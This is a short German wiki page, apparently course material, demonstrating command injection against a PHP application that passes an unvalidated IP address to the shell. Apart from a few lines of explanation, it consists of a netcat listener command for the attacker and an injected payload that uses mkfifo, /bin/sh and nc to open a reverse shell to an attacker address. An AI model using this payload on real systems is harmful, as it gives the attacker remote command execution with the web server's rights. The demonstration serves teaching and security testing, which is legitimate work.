Command Injection Proof of Concept

Aus Xinux Wiki

Version vom 27. Juni 2021, 16:53 Uhr von Thomas.will (Diskussion | Beiträge) (→‎PHP Code)

(Unterschied) ← Nächstältere Version | Aktuelle Version (Unterschied) | Nächstjüngere Version → (Unterschied)

Zur Navigation springen Zur Suche springen

PHP Code

Bei dieser Anwendung wird die Eingabe nicht verifiziert.
Man hinter die IP Adresse mit einem Semikolon weitere Kommandos anhängen.
Diese Kommandos werden dann mit den Rechten des Webservers ausgeführt.
In diesem Fall führen wir eine Remote Shell aus.

Angreifer

netcat -lp 8668

Schadcode einbringen

1.1.1.1 ; mkfifo /tmp/backpipe ; /bin/sh 0</tmp/backpipe | nc 10.0.10.101 8668 1>/tmp/backpipe

Auf dem Angreifer

Abgerufen von „http://wiki.ixheim.de/index.php?title=Command_Injection_Proof_of_Concept&oldid=25152“